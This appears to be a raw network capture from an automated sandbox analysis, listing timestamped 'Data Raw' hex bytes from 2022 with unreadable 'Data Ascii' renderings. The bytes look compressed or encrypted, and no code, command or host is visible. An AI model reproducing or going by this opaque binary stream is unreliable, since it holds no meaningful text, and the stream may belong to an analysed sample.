                                                                                                                                                  2022-11-15 17:54:38 UTC2288INData Raw: 94 78 29 4c 50 12 1c a8 fa ec b2 bd 54 6a 64 38 40 98 c1 9f d0 28 02 2e d4 42 cb 7e b3 7f 16 60 12 a2 04 da 01 0d c8 f0 ff 82 30 10 7e 03 c9 a6 e2 48 32 d1 b8 0b bd 57 00 39 49 1b c1 61 f4 17 a1 01 09 a8 2c 60 c7 8d 3b 4c 50 57 20 78 ba 4b af fb 8a a8 02 a5 c2 d6 62 d7 54 74 a2 20 2c dd d3 4c 04 5b a6 56 e8 68 00 57 c2 6e cc d0 54 46 07 2b 09 eb 47 f3 14 f0 a0 70 03 bf a2 60 7a 61 7f 22 78 f6 2b 04 8e 52 fa 9f ee 5c 27 c0 57 51 53 bb 8a 02 22 fd 39 81 eb e5 61 60 6d d8 f3 4a 04 59 8e cc 89 d9 fb 2d f1 3f ad f4 a4 fb 32 56 93 61 64 35 3e d9 79 3b eb 60 54 cb 05 23 69 48 26 d5 7b 14 4b 30 b8 56 be 06 2f d9 af 7d 4e 02 fe ee 61 28 13 01 f5 5e 71 ca 3b 8e 7e 4a fc 28 ad 3e da 70 4b ea 2b d2 5a ba 6d 1d 72 1e d0 13 ac e9 00 0e a9 f4 ff d1 1a 75 c4 b9 a3 0b 84
                                                                                                                                                  Data Ascii: x)LPTjd8@(.B~`0~H2W9Ia,`;LPW xKbTt ,L[VhWnTF+Gp`za"x+R\'WQS"9a`mJY-?2Vad5>y;`T#iH&{K0V/}Na(^q;~J(>pK+Zmru
                                                                                                                                                  2022-11-15 17:54:38 UTC2304INData Raw: 26 14 f7 36 14 bf ef eb 2f 5f bc d1 69 83 20 5d 6d 72 6d 43 2e ec eb e5 fa a2 69 a4 ae a6 51 c4 53 bb 20 01 de 5b 94 1e 8f e9 f3 c0 f4 ff 64 f6 b6 00 f0 9b 8d 77 4f 9a 58 9f 97 f7 b9 85 2b 86 09 a5 3f 20 16 07 e7 66 4b 05 75 e2 6e 9d df 82 21 e2 04 de dd e0 f8 4b 34 79 16 96 0e 53 04 7e 33 e7 bc ed 0c fc 8e d5 29 90 01 f3 3a 8f e5 b1 b6 73 cc 6c 5b bd 50 dd 4a f2 ec c8 1c 4e e8 42 3c 40 58 2b f4 a7 02 8f 3a a9 e7 7e 72 06 d0 89 7f 53 3f 47 63 e0 24 1a 90 70 34 91 a1 08 e7 32 30 1c cd 39 d3 2f 2d 07 46 0e e8 f4 f3 80 23 4b 94 b7 9a 0b f8 14 ff 1b 61 6f 19 e1 c6 0b d9 2b b2 a4 00 af cc 7c 34 4a 79 41 00 18 7f dd 02 f6 37 78 5e 17 04 1a 7b 60 a8 c6 21 b4 12 07 6d 3b ac fc b0 4b 21 be e0 b0 97 00 4c 8b ee 81 a5 03 ed 78 c6 da e8 2d 14 28 22 de 1e 01 ac 50 60
                                                                                                                                                  Data Ascii: &6/_i ]mrmC.iQS [dwOX+? fKun!K4yS~3):sl[PJNB<@X+:~rS?Gc$p4209/-F#Kao+|4JyA7x^{`!m;K!Lx-("P`
                                                                                                                                                  2022-11-15 17:54:38 UTC2320INData Raw: 5e 00 1f fa a0 df c1 48 83 00 ad e6 36 de da 17 4a a8 d2 40 bd 52 97 ea 30 12 0d c3 64 0b d1 05 f6 a4 d8 c6 5d 72 46 12 3d aa b0 e6 97 00 6a 50 fc 32 d9 02 48 40 1c 31 e7 1e f0 28 49 66 b8 c0 69 47 18 04 21 50 00 2b 3a 84 99 1d da ed 95 03 b7 cc df 41 fb 85 a0 eb a5 d0 2e b6 c5 c5 aa b8 b5 04 2a b0 20 bd 52 88 00 c2 3b e6 7d b4 28 31 4c 00 99 43 e1 a4 f1 04 af 24 01 f6 67 12 18 a5 e7 b0 23 68 07 41 2d ad 98 d0 07 f9 ab 2b 0b 26 4a 14 93 b8 d2 e0 da 0e ae 76 9b 70 20 ed 5d c7 ca f7 19 fb 7e c6 26 3f a7 28 e4 62 18 0b 5e 01 0d 44 ea 60 c5 20 79 aa 12 d4 19 43 6e 24 1c 27 32 ee 1e f3 f0 90 cc 00 fc c8 a6 c4 6a 8b 48 42 38 07 9e 16 aa 05 a2 41 9f 20 ea 39 22 91 0c 4c 34 66 cd 28 be 7b 47 04 5c 03 61 6f 89 0f eb 21 cc 45 c0 a4 30 2b ee b5 05 cc 7a 40 76 fd dc
                                                                                                                                                  Data Ascii: ^H6J@R0d]rF=jP2H@1(IfiG!P+:A.* R;}(1LC$g#hA-+&Jvp ]~&?(b^D` yCn$'2jHB8A 9"L4f({G\ao!E0+z@v
                                                                                                                                                  2022-11-15 17:54:38 UTC2336INData Raw: f9 cb 73 b9 ba f0 f8 84 fb 38 2e 8f 0c 49 6f 19 a4 8b 31 e8 ee 37 48 21 c8 fe 27 7b 13 5b 88 fa 2e 1c 22 ab 12 b6 e0 db 45 38 d8 53 ec f4 11 f6 ae 2f 5d 5e e4 c0 c4 93 6f 34 2d d4 5a 75 90 c0 71 ff 4d a0 44 22 29 08 d1 c7 9d 9a 17 f3 af 0c e4 49 35 21 a8 48 47 f4 00 7e e1 17 3b 5c f2 61 48 18 87 aa d0 98 2a 40 bc 18 02 19 0a 2e 24 05 14 fb 00 c0 67 bc 4c 2f 17 f2 12 07 94 a8 96 ff be e1 ce 8a f6 db 0d 71 1f 90 93 50 6a f8 cc 8f 4e 88 91 02 4c c6 28 04 55 5e b8 91 fa d7 e7 e8 1c 13 90 25 f5 6c f2 9d 57 30 78 50 47 00 6b c4 99 d4 85 f9 5a 8e 25 f7 eb 75 b1 70 33 68 10 04 0e 6c 3a ff 00 02 4e 73 71 ae 4f 5b ed 70 2d 33 75 18 a8 36 b6 50 52 8d 74 48 cb 68 dd 26 cf 13 fd fb c8 c4 3d 7e 87 40 d9 fc 9d 40 6c ea 3c 00 7c 33 8a ec 70 7f 9d 96 15 ba f3 6f 78 86 90
                                                                                                                                                  Data Ascii: s8.Io17H!'{[."E8S/]^o4-ZuqMD")I5!HG~;\aH*@.$gL/qPjNL(U^%lW0xPGkZ%up3hl:NsqO[p-3u6PRtHh&=~@@l<|3pox
                                                                                                                                                  2022-11-15 17:54:38 UTC2352INData Raw: 02 1f 38 52 28 bb 75 4c cb 12 54 f3 45 bc b8 10 69 bd 1e 44 3a 65 68 04 71 c7 91 ec 88 b7 d9 13 da aa 00 cb 11 66 99 20 1c 13 09 ff 47 90 78 4b ee ad 0e b8 49 cd 76 58 14 12 0a ff 52 c7 bc 55 cc 87 07 cb e0 b2 f0 61 d4 16 42 64 3a b3 48 40 a9 cc 4f 98 c0 ec c7 df 36 02 45 6a 83 ca 5f e1 80 fe 0e bf 19 46 00 ea 0f 4e f2 b5 fe ec 8e b5 f4 9f 61 34 35 45 f8 84 d6 20 69 4b 95 70 fb 3b 28 d8 85 5e ef 46 9c 80 a4 aa 57 1e 4a 15 ec b3 c3 3a 68 e4 e8 a5 3f 25 02 d3 57 0f 0b 40 0a 11 4d 01 a0 d4 7c a1 2f b4 71 5f 04 d2 19 db 00 b7 90 38 66 a5 60 41 26 48 7e a9 87 12 95 3a da c7 9e a7 f8 50 78 6c 10 fd 60 35 28 f6 7f ad 7d 08 1b 72 ae 4c 3f 81 58 9a 6c 48 6a 34 24 68 ad 86 2c 51 6d b7 3f 01 5e c7 ff 92 39 fc e2 41 04 f4 8f 45 4e 78 82 c5 94 64 dd c6 bd 4b c1 ba 30
                                                                                                                                                  Data Ascii: 8R(uLTEiD:ehqf GxKIvXRUaBd:H@O6Ej_FNa45E iKp;(^FWJ:h?%W@M|/q_8f`A&H~:Pxl`5(}rL?XlHj4$h,Qm?^9AENxdK0
                                                                                                                                                  2022-11-15 17:54:38 UTC2368INData Raw: a4 5f 12 a1 42 b4 be a3 cb 5b ea 70 33 5d a2 8e 2c 4a 31 60 00 4b 60 71 48 f5 01 4e 28 85 54 ae 21 fc d9 b5 50 98 51 99 d0 00 d5 e1 33 4f 62 57 fc cd 09 23 09 60 b4 f5 f1 0f 2d 00 b0 7a 1c 6a d3 00 82 ec 68 8f a9 d7 b4 e3 09 fb 8d 14 fd 75 ce 1b 2c e7 66 5c 41 6e b9 f5 00 6c b0 36 fa 7d 00 ad b2 d9 ae 62 50 33 e8 2c 2b 5a 84 05 aa bb ff 04 28 5b 23 c2 30 b7 c8 c3 ba 32 05 b0 15 6e e6 88 40 a2 27 3a 3c 9a 40 14 b8 1d 8d cb 3d ba 81 38 09 23 31 db b9 86 28 a0 39 78 59 05 71 4e 4b f4 ff aa ce b0 4f e9 a0 18 3a bd 78 d6 32 09 46 11 ee 74 fd 99 a0 7d 3a ec 7b c0 bc f9 c5 7f 48 22 54 e7 12 93 39 4f 42 68 38 94 99 00 fd d7 54 50 90 3a 5f ed bf 10 97 1a 0b f0 c5 c8 ae b1 3e 45 7b c0 ef eb 0f be 21 a9 35 78 2c 15 ee d4 fe 98 00 e4 a6 1f 76 69 a7 9d 7d 82 16 84 fb
                                                                                                                                                  Data Ascii: _B[p3],J1`K`qHN(T!PQ3ObW#`-zjhu,f\Anl6}bP3,+Z([#02n@':<@=8#1(9xYqNKO:x2Ft}:{H"T9OBh8TP:_>E{!5x,vi}
                                                                                                                                                  2022-11-15 17:54:38 UTC2384INData Raw: f6 aa 00 3b 1a e3 42 4a 30 28 a1 31 9a 99 1e 20 b8 85 29 cd 8a 90 b8 5c 01 38 a6 d1 f7 9a 0c 3e f8 48 c0 27 d8 4f 48 44 20 4b 1d 02 62 3a 90 61 a2 02 55 38 80 f1 99 89 cf 00 ad 21 61 00 5c d6 b6 4c fc 05 dc b9 24 b5 d0 b8 e1 c0 9c 61 01 a9 90 08 d5 20 70 84 4e e3 82 08 b3 57 d3 ca 07 4f cd 4b c0 7e 2a c6 28 b6 d4 25 df 60 7f f1 a3 df a6 81 e6 6f 39 72 76 6a e3 c4 27 cb dd 31 b8 51 f8 b8 0e 26 ed aa de 00 ad 9e 37 ab 74 9b 00 e0 f3 27 21 1b 09 92 01 09 65 28 35 f8 19 e0 a7 41 24 96 d3 63 b2 10 49 c8 00 f8 a8 74 54 cc c2 b8 10 44 e4 8c 00 56 1c 5d f4 59 4f c7 5a 7f 90 68 36 c1 8a 42 34 13 b6 c9 ee d8 6c a2 79 39 c2 0d 9d 88 23 e8 cd cb fb 62 78 ae b6 ba 5f 85 cc 29 70 f0 16 48 9b f8 50 4e 74 fc d4 c0 2d 92 38 b8 5c 9c 8b 01 d6 4d b1 25 ae dc 8f 45 b7 e8 40
                                                                                                                                                  Data Ascii: ;BJ0(1 )\8>H'OHD Kb:aU8!a\L$a pNWOK~*(%`o9rvj'1Q&7t'!e(5A$cItTDV]YOZh6B4ly9#bx_)pHPNt-8\M%E@
                                                                                                                                                  2022-11-15 17:54:38 UTC2387INData Raw: f8 c2 0c 45 ba e5 a7 31 e8 59 2d 4c 72 68 0c 84 cf 9b ae f2 e5 1d 36 e1 c3 2b 08 03 4f 0b 25 09 3a 22 a7 50 3f 94 d6 40 6c 7c bc a2 62 25 28 1f 78 48 90 2a b7 e8 2e 36 18 6e 01 40 c0 a7 3b fd e4 e2 05 ee aa 70 5e fe bc 0c 5f f2 e8 7d ea 28 3d 09 75 63 1c b0 38 d2 c1 cc d1 4b 3c 14 eb 69 16 1c d7 a4 ea 31 06 34 9a b8 0e ec 10 28 3e de 2c 00 a0 d6 28 24 89 d9 41 fd 28 66 b9 1c 51 67 7d f6 5c 70 41 9c 01 15 00 e1 f2 66 10 86 6f 32 16 fb ac f0 61 11 00 d8 fe af 7e 15 95 0b 57 2f 0c 83 74 c8 90 42 9c 04 9e 9d ab bb c0 82 ed 9f 21 b8 b7 20 80 34 2c cc 65 18 82 c9 9a b2 50 4a 20 7d 80 9c 09 f9 a6 f5 02 91 3a 93 b5 d9 2b 5d 5c 0b 50 26 97 09 52 e6 0b 1c 80 18 c6 22 be 24 4b 88 ff 8d 8f 6e ec 28 4b ed 58 c6 82 e8 f1 97 d8 58 00 59 ef db 67 80 90 41 a1 ea 1f 04 51
                                                                                                                                                  Data Ascii: E1Y-Lrh6+O%:"P?@l|b%(xH*.6n@;p^_}(=uc8K<i14(>,($A(fQg}\pAfo2a~W/tB! 4,ePJ }:+]\P&R"$Kn(KXXYgAQ
                                                                                                                                                  2022-11-15 17:54:38 UTC2403INData Raw: dd 48 08 92 60 07 5e ed a7 28 93 61 61 48 98 2f eb 30 cb 26 9f 7f fa 7e 4f c4 f8 38 c9 18 07 68 b4 b9 f8 14 04 34 6a 24 6f 8c ad 60 85 73 32 fe 8a 44 03 9e dc 7f 71 ab 91 c2 fb c4 e5 29 00 59 39 57 3e cd 1b f9 12 0b a9 b1 c8 de d8 33 bd d8 ec 95 f7 17 90 3f c2 27 b2 4a 15 57 dc 90 50 a5 7f 21 10 34 3a 05 2b d9 3e 1d bc c4 b0 85 18 a9 00 13 bc 2c 09 bd 58 2e e4 70 ca 84 97 92 6c 5f d9 08 88 0c de 82 b4 4a 94 16 f8 10 12 a0 50 29 40 ec 89 f3 fd 47 27 f6 3f 0e 11 63 38 b1 a0 3b 4d 1f ec d7 07 8f ab 28 3a aa 92 5a 7c 18 a3 cc 09 5e ea 38 f1 a0 28 aa 65 14 c4 5a f0 31 60 3b ce e9 b6 f0 94 64 1a a5 d9 3d 30 7b 88 a7 fd 03 70 74 48 96 69 04 7e 32 07 fa 29 ba b4 4c b1 00 e2 da e4 c8 15 7d eb 59 09 be 97 f3 6b df f9 15 61 2e 3d 53 80 f0 a7 32 80 cb e1 aa 02 5b c4
                                                                                                                                                  Data Ascii: H`^(aaH/0&~O8h4j$o`s2Dq)Y9W>3?'JWP!4:+>,X.pl_JP)@G'?c8;M(:Z|^8(eZ1`;d=0{ptHi~2)L}Yka.=S2[
                                                                                                                                                  2022-11-15 17:54:38 UTC2419INData Raw: 75 10 10 fb c5 20 31 99 5f b4 0b c6 3e 73 7c 00 9e f4 84 f8 5b a7 44 f7 94 12 39 73 8a ee 17 db bc 1c 81 ad 85 e0 89 00 91 9a 74 00 30 0d 90 20 68 58 02 3a ec a7 7d bd 28 ab 82 31 cb 81 67 fc d8 3d b0 49 a6 be 81 45 ee 44 37 40 a5 79 f1 39 0f e4 3a b3 70 00 a3 03 28 fb f1 c1 16 88 59 3a 03 db 18 58 7e 1f d7 88 a3 ab fc 05 40 9e 53 54 6e 37 f0 f0 e5 dd 4d b9 07 3b 26 2d 5f ae 6a b6 23 f0 96 d6 42 3a a2 3a da 00 57 45 9c c5 04 65 be e7 37 af 04 d6 11 a6 40 00 77 f5 1c 4d 12 93 37 04 04 21 8e 33 27 97 f4 d3 68 1f 1c 91 20 93 82 8c e9 d1 0e 7d 80 8b 5d 9f de 6a 98 2e c4 e0 70 9d e3 02 01 e3 21 92 40 ea 38 80 46 a7 ee f5 80 cb b9 90 c9 38 ab 1a 82 f9 9b 86 c7 e7 a4 6c 79 1e 91 04 1a ac 96 1b 81 de 43 fd bd fc ab a7 c1 d8 e9 73 a2 0b c3 a9 bc fa 85 0a 49 33 e2
                                                                                                                                                  Data Ascii: u 1_>s|[D9st0 hX:}(1g=IED7@y9:p(Y:X~@STn7M;&-_j#B::WEe7@wM7!3'h }]j.p!@8F8lyCsI3
                                                                                                                                                  2022-11-15 17:54:38 UTC2435INData Raw: 10 78 6d f0 3d 7c 84 06 fd ea 4e 23 ec 13 35 d7 1c d0 b2 fb a5 09 27 f9 aa 5d 25 14 95 e0 5c 4f 20 ac 03 00 17 a4 46 0e c4 fd 74 92 05 a7 76 e5 15 01 af 9c 60 ea 4d 02 e8 11 e9 49 0f 6e 17 41 62 ff cf f8 20 4f e9 78 a4 cb 40 d6 58 48 69 51 a1 44 b4 00 e1 e8 d4 3b 48 62 c2 bd bf c0 cc b1 84 be 76 09 24 5e c4 98 20 b5 23 0e bf 31 cf eb 36 ea df 2c 16 25 3a 01 67 3e 58 5a f6 6e e8 a8 c7 30 35 0e 11 5e d2 24 cc 1a c3 6a f0 79 3a f1 98 cc 80 a0 2b 41 80 a4 a8 5e 34 80 30 21 33 1b e4 aa 00 49 31 41 73 8f d1 f7 d4 54 e6 50 2a 04 6c 24 8c 33 7a 5d 44 3a 7b b0 fa c4 c1 ef a4 d8 07 10 c5 e0 9f 00 7f 94 78 30 81 7b 37 16 53 47 27 a1 9c ed 48 74 41 8b 06 71 d8 3b 3d b7 1c 0c df f6 6a 69 9e 66 26 80 3c bf 60 d6 22 51 34 09 f8 28 2b 7d f2 e4 5a 06 ec ec 2d 2e 00 31 bc
                                                                                                                                                  Data Ascii: xm=|N#5']%\O Ftv`MInAb Ox@XHiQD;Hbv$^ #16,%:g>XZn05^$jy:+A^40!3I1AsTP*l$3z]D:{x0{7SG'HtAq;=jif&<`"Q4(+}Z-.1
                                                                                                                                                  2022-11-15 17:54:38 UTC2451INData Raw: e3 62 b9 0a 7a 3a b0 5e cc c2 8c f2 50 5c 18 3e 4e a0 28 1b b7 3e 1d 92 1d 03 ee c4 16 8d 4c ea 91 a4 34 15 1e 2a af a0 20 62 69 1e ad 9f aa 84 7a 75 09 41 73 3a 0f 82 85 0c eb 68 d8 40 c8 f2 27 9f 74 31 e4 b5 01 df 66 3d e9 71 a0 42 c3 a8 41 7b 4b e0 ae 16 7e a4 49 20 38 40 9d fe c2 0d 06 94 b9 98 e0 be d6 04 92 c9 84 54 73 42 07 3a a9 c8 2c a1 4a 49 72 d0 00 2f fc 57 d4 8f 44 50 b4 10 00 41 a3 bc 98 18 b4 bc a4 02 1c 40 ee 5b b8 b8 87 07 00 6b c0 93 bc 7f f9 5d 9e ee ef 0a 7b 8a 19 01 14 12 77 e2 dc 80 5f 32 6f a7 be 02 e4 ba a0 b1 47 e7 54 0c 1f 74 30 dc c4 f7 20 0c a2 31 66 c9 4d c2 32 39 67 0d 40 a0 28 57 8e 35 69 12 ba 85 65 a0 5c 5d a8 cc 6e 68 c0 8e 36 28 2a 2d 62 2f e4 1b c2 d2 82 de 07 f3 c0 48 44 12 5a 3f f0 25 5c ec 97 ec c5 01 8e f0 3a 30 2b
                                                                                                                                                  Data Ascii: bz:^P\>N(>L4* bizuAs:h@'t1f=qBA{K~I 8@TsB:,JIr/WDPA@[k]{w_2oGTt0 1fM29g@(W5ie\]nh6(*-b/HDZ?%\:0+
                                                                                                                                                  2022-11-15 17:54:38 UTC2467INData Raw: e3 dc e0 56 3f 98 14 fa 5a 11 dc fc 0d 00 62 47 1e f0 63 0c 41 a9 ee 15 97 82 d7 dc 14 d8 14 90 8a 00 66 6d 45 8c a4 a5 2e b1 25 e8 77 dd 4e e8 0c 57 6e dd d5 40 cd 02 70 c9 66 48 c3 2c cb 5b 07 24 96 a0 06 36 13 16 98 2e a1 15 84 8b a2 29 7f 98 c9 1e 2c c0 59 5e e3 0f cf 2f 00 30 ae fc 3f 80 e2 35 66 0c e6 b3 db 0d 40 36 4b 95 30 00 cb 45 2f 1c f6 12 f5 d4 3e bc 81 f4 8d 26 8c 6b cc 90 a5 02 74 6a 9a 5d f5 09 20 82 3a 0d 92 81 9c 6e 0a f3 4e e3 03 c0 57 51 81 09 29 2a 3a de 87 18 45 40 b6 89 28 91 78 b1 09 30 f1 a4 2f 87 a8 cb 87 5d 79 4c c8 12 1c 5e 8d fd 10 81 ad 55 57 ea 00 63 c8 ac 00 ab 61 a5 db fa e8 af 2e 3b 03 0d 89 11 51 38 5f 79 cc 81 0a 8c fc 53 e0 cc 95 8f 00 9d 9e 91 f3 7b 9c 7d ff e3 11 d5 5a e8 92 5c 5f 2c cb 14 0f 3a 65 9c a9 ca 70 24 00
                                                                                                                                                  Data Ascii: V?ZbGcAfmE.%wNWn@pfH,[$6.),Y^/0?5f@6K0E/>&ktj] :nNWQ)*:E@(x0/]yL^UWca.;Q8_yS{}Z\_,:ep$
                                                                                                                                                  2022-11-15 17:54:38 UTC2483INData Raw: e0 70 b8 ad 50 c8 11 23 63 09 d7 48 f0 14 55 8e 38 d3 c8 e8 da 88 e9 28 20 9e 99 00 5d 8a d6 c4 73 cc 03 ed 4b ff ba c8 e0 0c 4d f0 1c 4a ff c5 80 88 f4 9b 4e 5e aa 88 64 2e f3 21 60 00 f2 a6 18 42 bf d8 52 30 83 26 0c 9c 56 89 5f 3c ae 41 85 5e 9a 15 6d 75 2f 3b fa 70 9e 58 53 68 0b a7 ad 8e 1b 5e 1d 84 de e7 2c 34 d2 f9 5a d5 c4 96 97 d4 b7 80 56 be 39 93 c3 1a bd 5b c0 b4 8e c0 a2 51 b9 b6 16 20 a7 43 af 64 30 bf cb 42 4d de 4a b0 d8 56 42 68 25 5e 74 0d 25 f9 cb cb 12 27 55 96 06 21 51 b9 89 c8 59 5f bc 82 02 57 50 b8 17 1b fe ee c5 b5 d1 58 52 29 96 5d ef 29 10 87 5f bb 61 be e7 3c 30 b8 01 25 ee 3e 50 8c 02 f9 ab 2b e8 4c 1c 5d ee f0 00 f7 c7 db 7d 9b d8 6f ed 27 5d aa c0 28 64 98 b1 94 84 3c 7b f2 c0 e4 d4 24 a2 09 0f 0b 5e 02 0e 45 60 7f 30 fe 8f
                                                                                                                                                  Data Ascii: pP#cHU8( ]sKMJN^d.!`BR0&V_<A^mu/;pXSh^,4ZV9[Q Cd0BMJVBh%^t%'U!QY_WPXR)])_a<0%>P+L]}o'](d<{$^E`0
                                                                                                                                                  2022-11-15 17:54:38 UTC2499INData Raw: a0 10 dc 7b 15 13 82 e1 ba 02 45 a7 17 62 7f 44 38 ee 73 70 30 27 91 02 df b2 f8 40 eb e1 cd 0c 22 9f 93 a6 a0 b5 ec 39 16 f1 ff f4 ff 41 64 d5 5a 60 86 00 c8 de d8 28 eb 94 24 5f 3b f8 18 cf 86 b0 02 18 ca 50 30 53 75 23 70 20 03 00 27 d5 ff 96 ea d3 22 39 14 f4 2d 80 0f 00 25 f7 6a 10 70 40 a6 5f eb c0 3d 5f c9 66 02 db 7d a2 e1 9e c4 63 f4 00 1c 3c 7b 59 d8 29 08 37 49 c9 06 07 3a 94 7f db 10 18 a5 de a0 73 49 00 34 ee 65 73 90 fb ff dd 99 bc 0a f8 9f e5 12 70 ea 91 34 b4 d6 ea d1 fb 0b 2d 51 05 b2 48 0a ae 93 c8 44 74 ff f2 7c 8f 85 eb 9b 51 60 8b 76 e2 83 0a 78 90 01 3c d4 86 c2 a4 5c e5 2f ae 23 a4 a8 03 79 09 12 4a 9c fd 00 0d e6 48 ab 2e 89 88 84 62 95 7c b1 11 d7 b9 c8 b0 30 21 45 30 7b bf e6 ca fe 8c 05 f9 85 a5 2b d8 ad 88 4b 30 c8 78 c7 dc 1c
                                                                                                                                                  Data Ascii: {EbD8sp0'@"9AdZ`($_;P0Su#p '"9-%jp@_=_f}c<{Y)7I:sI4esp4-QHDt|Q`vx<\/#yJH.b|0!E0{+K0x
                                                                                                                                                  2022-11-15 17:54:38 UTC2515INData Raw: db 5d e0 b2 5c 14 90 39 79 13 0a 21 82 2c 5b 75 85 74 b7 bb 83 15 dc 9e bc 01 53 55 df c6 6a 63 c8 24 2c c1 01 39 59 ac f4 cf 93 ad c5 dd 70 60 8a 25 e3 ef 57 46 f0 59 4d 5c 0b 86 e4 68 5c 8c be 82 29 71 2e 6b b3 77 05 2c f3 0b 1c a4 7c 58 62 fb d6 00 37 a2 44 c5 27 97 78 c0 85 62 e6 c9 27 9f 84 e4 a4 00 3e 88 f2 d4 37 a0 28 1c bf 84 90 4d 59 d0 80 03 c8 70 f4 c3 32 12 39 48 b4 00 24 e5 97 7f 88 05 0f 39 12 07 18 62 d6 8d 14 7e 6c c9 00 28 8a 1e 71 8e 2d 81 66 76 60 06 c7 78 ee a0 e9 3d 1c 04 27 6a a9 98 07 a3 e8 02 ce 15 82 24 bc be d7 c6 64 45 a2 2a f0 04 7b 02 ca c0 16 c5 e0 86 0f 20 48 54 18 30 14 bf 59 50 39 18 fb a7 78 bf 9a a0 28 da 42 40 b8 af 06 52 d7 eb 53 c0 10 18 48 98 43 30 87 b1 03 69 21 90 20 39 31 e0 94 d4 ef 31 40 2e 5e bc ae 85 4f 29 5a
                                                                                                                                                  Data Ascii: ]\9y!,[utSUjc$,9Yp`%WFYM\h\)q.kw,|Xb7D'xb'>7(MYp29H$9b~l(q-fv`x='j$dE*{ HT0YP9x(B@RSHC0i! 911@.^O)Z
                                                                                                                                                  2022-11-15 17:54:38 UTC2531INData Raw: 60 72 10 c4 41 38 82 30 fa ac 9e 48 9b 90 00 bc b1 57 be b9 3c 76 e0 18 d3 20 50 30 d8 af a0 28 46 b6 0c 84 a0 73 05 1c b0 2f 78 ae c0 0d 71 c8 1d 79 cc 26 c0 6b 1b fd b4 27 61 1a b8 bc 1d b8 d8 ea 00 f5 34 44 da 2b 43 e0 7f 4b 1a bd 8c 17 74 b7 cc 02 8d 9f 02 7f f1 94 90 f4 da e2 40 a5 f2 b6 0e 17 f0 a0 c2 f4 40 11 44 0e 60 b8 75 b6 88 98 80 15 3a cb 7a ec ff 03 e3 fe e7 0e e9 21 9b a0 00 72 9e d7 45 e1 50 4f d5 92 a3 01 09 70 ab 95 0c 61 27 78 23 1d 46 ce 40 c8 3f 43 ae 51 f9 1d 18 78 dd 00 09 2a 7a 58 5c 02 bf 6c 42 04 bc d4 42 e5 bf b8 c1 05 34 38 0e 30 13 fc f4 fc d3 13 39 da 11 a9 fd c0 6c a0 64 01 02 2f 51 87 c0 b6 1e 07 c5 28 d9 44 ba 40 a8 49 02 82 a1 d1 0b 86 a7 2e 31 85 54 8f fe 30 aa c4 ab 7c 74 1c 30 5a d9 79 96 39 3f 00 0a ca d8 17 72 07 b0
                                                                                                                                                  Data Ascii: `rA80HW<v P0(Fs/xqy&k'a4D+CKt@@D`u:z!rEPOpa'x#F@?CQx*zX\lBB4809ld/Q(D@I.1T0|t0Zy9?r
                                                                                                                                                  2022-11-15 17:54:38 UTC2547INData Raw: 09 4b 04 ae e9 c0 3c a5 52 f2 26 06 29 ee f7 55 88 34 01 ef fe a0 4a 6f 23 3e 53 ed 18 d0 e8 6b 94 00 19 69 85 bd a2 98 56 74 26 c9 5b 1b 0a e7 6f c8 e1 dd 34 ef af 7a 75 a1 97 55 f1 8b 6c 6c 00 a2 a8 dc a6 62 d5 ed 00 f6 92 82 80 f9 5d 9e fc 9f d1 79 45 4b 90 0c d0 41 83 c0 19 67 8e 78 e5 ba 5f 85 80 3f 37 35 92 67 02 e5 26 03 a7 c6 00 2c b7 b4 8d 07 35 89 20 13 39 57 cc fe 70 25 46 3f 61 18 1b 03 6b 1c 23 30 84 17 8b ff c0 87 fd 1e 94 e0 84 9c 8e 40 c6 d8 a9 82 e1 00 7d 5b e2 ae 63 85 66 d3 1e 05 0c 02 d3 ba 88 5c a1 1d 9e de c8 80 6e 0a b8 28 75 18 29 7e 47 7c 80 87 a2 fd 9d 21 ae 00 cf f9 5a b2 98 ff 6f 44 54 02 14 a1 00 37 5b 24 ce 38 c5 1b 89 0a 70 78 b9 c2 28 61 34 ed 6d 97 0e ab b4 f8 c7 10 d5 c4 fb 7f 3f c2 a6 07 e5 3d 81 1f b0 76 31 23 06 0a 12
                                                                                                                                                  Data Ascii: K<R&)U4Jo#>SkiVt&[o4zuUllb]yEKAgx_?75g&,5 9Wp%F?ak#0@}[cf\n(u)~G|!ZoDT7[$8px(a4m?=v1#
                                                                                                                                                  2022-11-15 17:54:38 UTC2563INData Raw: 98 62 f2 57 26 52 18 ad 00 1f 7e 34 83 09 4b 5b b3 ca 5c 12 2b 95 ed 5c 02 05 52 4d a0 3c f8 a8 08 b5 c5 fd 01 06 ed a4 86 66 02 97 51 d2 4d a6 96 ff 53 60 80 f8 4e 87 1a d7 5a 32 75 60 a0 33 48 b8 3f b4 41 8a d4 3b 97 00 65 56 e0 e4 69 cb 4c 13 49 31 1e 2e 78 b8 60 a1 d8 cc 27 16 46 45 ec be 03 75 e5 de 2f 25 98 d4 e4 9c 10 da 9a 27 05 af 0d d7 f7 45 24 d0 60 d7 ea 07 c7 d5 6b fd ac 00 5c e2 ca 61 f9 07 02 00 37 c6 15 38 70 4f 08 1a 5d b0 c0 31 ab 30 7c c3 d2 51 5b 00 ad b4 22 7a 21 73 97 18 c8 0b d9 7e 14 28 80 02 99 00 9e e5 71 90 d5 43 8f a9 c1 28 0d 3a 22 14 2a 70 5c d3 c5 d2 20 39 37 1b a6 ae 1b 5e 06 28 6d 35 f4 f0 c6 2d e2 f8 56 10 04 32 68 63 82 68 5c a1 dc 86 72 9a 11 ea f8 2f a0 37 87 44 49 0f 60 04 28 a6 b8 8b 02 80 a3 8c 0f 51 8d 69 1b c1 4c
                                                                                                                                                  Data Ascii: bW&R~4K[\+\RM<fQMS`NZ2u`3H?A;eViLI1.x`'FEu/%'E$`k\a78pO]10|Q["z!s~(qC(:"*p\ 97^(m5-V2hch\r/7DI`(QiL
                                                                                                                                                  2022-11-15 17:54:38 UTC2579INData Raw: 66 b2 02 f9 b9 59 63 56 98 00 94 a1 4b 6d d3 3e ad e0 a4 ab 70 90 11 4e 6e 25 d8 6a 5f 46 13 14 ec 41 01 14 17 27 c7 ae c8 08 c4 0b ab 7b 08 44 dd 6c 28 00 2c ec b6 19 9b d1 bb ac ea d4 0c 8d 37 28 74 50 61 82 57 d9 bd 71 6e 10 67 a8 25 b2 3b 00 f6 8a b7 79 5a fc 8f 9f 1a 39 48 9e 59 c6 a5 1f 63 c5 4a 47 cd a3 77 c9 81 81 d0 7a c0 89 28 64 80 48 e4 36 e9 00 0e 91 21 29 d6 1f b1 49 27 bc d0 de 48 60 1c ad fb e7 4b ec ea 31 93 e8 02 01 c3 68 2e d0 18 f3 ad ca 09 9d 3f 45 16 f8 a8 01 76 94 93 ea 98 fd 9b e0 b1 b3 3c 4a de cb ef 30 69 5e 4d ca 04 28 e1 ef c7 43 01 e4 39 c3 40 3e 05 